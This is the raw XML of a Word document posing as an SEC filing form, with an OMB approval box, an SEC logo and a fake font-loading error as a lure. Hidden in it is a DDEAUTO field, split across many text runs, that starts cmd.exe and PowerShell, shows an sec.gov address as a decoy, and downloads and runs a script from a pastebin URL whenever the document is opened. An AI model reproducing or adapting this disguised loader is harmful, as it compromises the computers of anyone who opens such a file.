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51" w:tblpY="16"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3220"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AC24C0" w:rsidTr="00AC24C0">
        <w:trPr>
          <w:trHeight w:val="110"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3220" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00AC24C0" w:rsidRDefault="00AC24C0" w:rsidP="00AC24C0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00B45112">
              <w:t>OMB APPROVAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC24C0" w:rsidTr="00AC24C0">
        <w:trPr>
          <w:trHeight w:val="670"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3220" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00AC24C0" w:rsidRDefault="00AC24C0" w:rsidP="00AC24C0">
            <w:r>
              <w:t>OMB Number:      3737-0933</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AC24C0" w:rsidRDefault="00AC24C0" w:rsidP="00AC24C0">
            <w:r>
              <w:t>Expires:                  March 31, 2018</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AC24C0" w:rsidRDefault="00AC24C0" w:rsidP="00AC24C0">
            <w:r>
              <w:t>Estimated average burden</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AC24C0" w:rsidRDefault="00AC24C0" w:rsidP="00AC24C0">
            <w:r>
              <w:t>hours per response                     18</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B45112" w:rsidRDefault="00F31C77" w:rsidP="00B4511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91.5pt">
            <v:imagedata r:id="rId4" o:title="sec-logo"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45112" w:rsidRDefault="00B45112" w:rsidP="00B45112"/>
    <w:p w:rsidR="00B45112" w:rsidRDefault="00AC24C0">
      <w:r w:rsidRPr="00AC24C0">
        <w:t>Could not load font --terminus-medium-r-normal--12----c--</w:t>
      </w:r>
    </w:p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AC24C0" w:rsidRDefault="00AC24C0"/>
    <w:p w:rsidR="000237E1" w:rsidRPr="004A392C" w:rsidRDefault="000237E1" w:rsidP="00AC24C0">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidRPr="000237E1">
        <w:instrText>DDEAUTO c:\\windows\\sy</w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">stem32\\cmd.exe "/k </w:instrText>
      </w:r>
      <w:r w:rsidR="004A392C">
        <w:instrText xml:space="preserve">powershell -C </w:instrText>
      </w:r>
      <w:r w:rsidR="00642D9D">
        <w:instrText>;</w:instrText>
      </w:r>
      <w:r w:rsidR="009A58AF">
        <w:instrText xml:space="preserve">echo </w:instrText>
      </w:r>
      <w:r w:rsidR="00183CB3">
        <w:instrText>\"</w:instrText>
      </w:r>
      <w:r w:rsidR="009A58AF">
        <w:instrText>https:/</w:instrText>
      </w:r>
      <w:r w:rsidR="004018F3">
        <w:instrText>/</w:instrText>
      </w:r>
      <w:r w:rsidR="009A58AF">
        <w:instrText>sec.gov/</w:instrText>
      </w:r>
      <w:r w:rsidR="00183CB3">
        <w:instrText>\"</w:instrText>
      </w:r>
      <w:r w:rsidR="005529E6">
        <w:instrText>;</w:instrText>
      </w:r>
      <w:r w:rsidR="005529E6" w:rsidRPr="005529E6">
        <w:instrText>IEX((new-object net.webclient).downloadstring('</w:instrText>
      </w:r>
      <w:r w:rsidR="007B4B55" w:rsidRPr="007B4B55">
        <w:instrText>https://pastebin.com/raw/pxSE2T</w:instrText>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="007B4B55" w:rsidRPr="007B4B55">
        <w:instrText>J1</w:instrText>
      </w:r>
      <w:r w:rsidR="005529E6" w:rsidRPr="005529E6">
        <w:instrText>'))</w:instrText>
      </w:r>
      <w:r w:rsidR="00183CB3">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">" 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sectPr w:rsidR="000237E1" w:rsidRPr="004A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5A"/>
    <w:rsid w:val="000237E1"/>
    <w:rsid w:val="00032BCF"/>
    <w:rsid w:val="001510BD"/>
    <w:rsid w:val="00183CB3"/>
    <w:rsid w:val="003C6FAA"/>
    <w:rsid w:val="004018F3"/>
    <w:rsid w:val="004A392C"/>
    <w:rsid w:val="00530E87"/>
    <w:rsid w:val="005529E6"/>
    <w:rsid w:val="005A64D5"/>
    <w:rsid w:val="006067A5"/>
    <w:rsid w:val="00642D9D"/>
    <w:rsid w:val="00675C68"/>
    <w:rsid w:val="006E006F"/>
    <w:rsid w:val="00794756"/>
    <w:rsid w:val="007B4B55"/>
    <w:rsid w:val="00813163"/>
    <w:rsid w:val="0081415A"/>
    <w:rsid w:val="008D759B"/>
    <w:rsid w:val="009574EF"/>
    <w:rsid w:val="009A58AF"/>
    <w:rsid w:val="009B0070"/>
    <w:rsid w:val="009D0F59"/>
    <w:rsid w:val="00A178FB"/>
    <w:rsid w:val="00AA57A6"/>
    <w:rsid w:val="00AC24C0"/>
    <w:rsid w:val="00B45112"/>
    <w:rsid w:val="00DD3BA0"/>
    <w:rsid w:val="00E350DF"/>
    <w:rsid w:val="00E35DD3"/>
    <w:rsid w:val="00F31C77"/>
    <w:rsid w:val="00F618E1"/>
    <w:rsid w:val="00F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3E4E9-9DBF-43BB-92EF-A8EC0300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2017-10-10T10:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-10-11T03:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>